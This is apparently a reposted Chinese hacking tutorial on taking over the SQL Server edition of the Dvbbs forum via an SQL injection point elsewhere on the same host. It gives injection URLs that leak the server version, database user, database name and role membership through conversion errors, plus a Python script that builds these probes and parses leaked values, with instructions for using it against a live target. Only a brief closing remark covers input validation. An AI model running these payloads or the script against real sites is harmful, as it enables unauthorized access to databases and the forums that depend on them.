On using SQL injection to break into the SQL Server edition of the Dvbbs (动网) forum

xiaoxiao, 2021-03-06

The current release of Dvbbs (动网论坛) is 7.0 SP2, and its own security is already quite good, so breaking it through its own scripts is hard. We can, however, get at it indirectly. The IIS + ASP + SQL Server 2000 combination is very common, and a site that runs a lot of ASP scripts will almost inevitably have some that pass user input into SQL unchecked. If a host has a SQL injection point anywhere, and the same host runs the SQL Server edition of Dvbbs, the forum is as good as yours, because the injection point gives us a way into the database the forum depends on. Let's look at an example.

1. First, identify the target

Suppose the following URL is injectable:

http://www.loveyou.com/type.asp?id=6

To test it, append a single quote after the 6:

http://www.loveyou.com/type.asp?id=6'

This returns the error:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server] Unclosed quotation mark before the character string ''.

The unclosed quotation mark shows that the `id` parameter is spliced straight into the SQL statement without any validation.

Next, find out the server version:

http://www.loveyou.com/type.asp?id=(SELECT @@version)--

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data type int.

The `id` column is an integer, so SQL Server tries to convert our string result to int, fails, and echoes the whole value back in the error message. That conversion error is the trick used by every probe below.

Read the banner carefully: 'Windows NT 5.0 (Build 2195: Service Pack 4)' describes the operating system (Windows 2000 SP4), not the database. The SQL Server build is 8.00.760, which is SQL Server 2000 SP3; SP4 is build 8.00.2039. So the host is fully patched but the database engine is one service pack behind.

Get the database user the application connects as:

http://www.loveyou.com/type.asp?id=(SELECT user_name())--

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'WebUser' to a column of data type int.

From the error message, the current database user is WebUser.

Get the name of the database the connection is using:

http://www.loveyou.com/type.asp?id=(SELECT db_name())--

Returns:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value '01city' to a column of data type int.

From the error message, the current database is 01city.

Next, test the permissions. (Note: our goal is the forum, not the operating system, so the database privilege level matters less to us than it otherwise would.)

http://www.loveyou.com/type.asp?id=(SELECT IS_SRVROLEMEMBER('sysadmin'))--

This time there is no database error; the page shows the application's own "the current record has been deleted" message. IS_SRVROLEMEMBER returned 0, so the query ran as id=0 and found no row: the connection is not sysadmin. (A NULL result, which the function returns for an unknown role name, would look exactly the same, so a negative answer here is only suggestive.) Continue:

http://www.loveyou.com/type.asp?id=(SELECT IS_MEMBER('db_owner'))--

The page displays normally, meaning the function returned 1 and record id=1 was rendered. So the connecting user is db_owner of the 01city database: not a server administrator, but more than enough to manipulate the data.
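The whole probing sequence above (quote test, version, user, database, role checks) is easy to mechanise once you recognise that every string answer arrives inside the ODBC 80040e07 conversion error and every 0/1 answer arrives as "record shown" or "record missing". The following Python is an added example, not code from the original article: it builds the article's probe URLs, parses the leaked value out of a response body, maps the 8.00.NNN build in the @@version banner to its service pack, interprets the role probes, and shows the integer check the vulnerable page should have applied. The host www.loveyou.com and the `type.asp?id=` parameter are the article's fictional example; the sample responses are constructed from the error text quoted above; the sysadmin probe uses IS_SRVROLEMEMBER, which is assumed since that payload is garbled on the original page.

```python
import re
from typing import Dict, Optional
from urllib.parse import quote

# Example host and parameter from the article (assumed fictional target).
BASE_URL = "http://www.loveyou.com/type.asp?id="

# The article's probes, in order. Each lands in the integer `id` slot, so a string
# result comes back inside the nvarchar -> int conversion error (ODBC 80040e07),
# while IS_MEMBER / IS_SRVROLEMEMBER return 0 or 1 and simply select record 0 or 1.
# IS_SRVROLEMEMBER for the sysadmin check is an assumption (garbled in the original).
PROBES = {
    "version": "(SELECT @@version)",
    "user": "(SELECT user_name())",
    "database": "(SELECT db_name())",
    "sysadmin": "(SELECT IS_SRVROLEMEMBER('sysadmin'))",
    "db_owner": "(SELECT IS_MEMBER('db_owner'))",
}


def build_url(payload: str) -> str:
    """Probe URL; the trailing `--` comments out whatever followed `id=` in the query."""
    return BASE_URL + quote(payload + "--", safe="()'@-")


# SQL Server 2000 wording (error 245) and the SQL Server 2005+ wording of the same error.
CONVERT_ERR = re.compile(
    r"(?:Syntax error converting|Conversion failed when converting) the "
    r"n?(?:var)?char value '(?P<value>.*?)' to (?:a column of )?data type int",
    re.IGNORECASE | re.DOTALL,
)


def extract_value(body: str) -> Optional[str]:
    """Pull the leaked string out of a conversion-error page, or None if there is none."""
    m = CONVERT_ERR.search(body)
    return m.group("value") if m else None


# Engine builds SQL Server 2000 reports in @@version (general knowledge, not from the article).
SQL2000_BUILDS = {194: "RTM", 384: "SP1", 534: "SP2", 760: "SP3 (or SP3a)", 2039: "SP4"}


def sql_server_patch_level(banner: str) -> str:
    """Map the 8.00.NNN build in an @@version banner to its service pack.
    The 'Service Pack N' text in the banner belongs to the Windows host, not SQL Server."""
    m = re.search(r"\b8\.00\.(\d+)\b", banner)
    if not m:
        return "not SQL Server 2000"
    return SQL2000_BUILDS.get(int(m.group(1)), "unknown SQL Server 2000 build")


def role_probe_result(body: str, missing_record_marker: str) -> str:
    """Interpret a 0/1 role probe: 0 (or NULL for an unknown role/login) selects no
    record, so the app shows its 'missing record' page; 1 renders record id=1."""
    if missing_record_marker in body:
        return "not a member (function returned 0 or NULL)"
    return "member (function returned 1)"


def is_valid_id(raw: str) -> bool:
    """The check the vulnerable page lacks: only a plain integer may reach the query."""
    return re.fullmatch(r"[0-9]{1,9}", raw) is not None


# Constructed responses modelled on the error text quoted in the article.
ODBC_PREFIX = ("Microsoft OLE DB Provider for ODBC Drivers error '80040e07' "
               "[Microsoft][ODBC SQL Server Driver][SQL Server]")
BANNER = ("Microsoft SQL Server  2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 "
          "Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on "
          "Windows NT 5.0 (Build 2195: Service Pack 4)")


def conversion_error(value: str) -> str:
    return (ODBC_PREFIX + "Syntax error converting the nvarchar value '" + value
            + "' to a column of data type int.")


SAMPLE_RESPONSES = {
    "version": conversion_error(BANNER),
    "user": conversion_error("WebUser"),
    "database": conversion_error("01city"),
    "sysadmin": "<p>The current record has been deleted.</p>",
    "db_owner": "<h1>Type 1</h1><p>normal page for record 1</p>",
}


def run_offline() -> Dict[str, str]:
    """Replay the article's five probes against the constructed responses."""
    marker = "record has been deleted"
    out: Dict[str, str] = {}
    out["version"] = extract_value(SAMPLE_RESPONSES["version"]) or ""
    out["patch"] = sql_server_patch_level(out["version"])
    out["user"] = extract_value(SAMPLE_RESPONSES["user"]) or ""
    out["database"] = extract_value(SAMPLE_RESPONSES["database"]) or ""
    out["sysadmin"] = role_probe_result(SAMPLE_RESPONSES["sysadmin"], marker)
    out["db_owner"] = role_probe_result(SAMPLE_RESPONSES["db_owner"], marker)
    return out


if __name__ == "__main__":
    for name, payload in PROBES.items():
        print(f"{name:>9}: {build_url(payload)}  valid id? {is_valid_id(payload)}")
    for key, value in run_offline().items():
        print(f"{key:>9}: {value}")
```

Against a live target you would replace `SAMPLE_RESPONSES` with the bodies fetched from `build_url(...)`; the `missing_record_marker` string has to be taken from the application's own "no such record" page, which is why the 0/1 probes are inferred from page behaviour rather than from a database error. Note that `is_valid_id` rejects every payload in `PROBES`: a `CInt`-style check or a parameterised query on the ASP side would have closed the whole chain.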

Please credit the original source when reposting: https://www.9cbs.com/read-52550.html
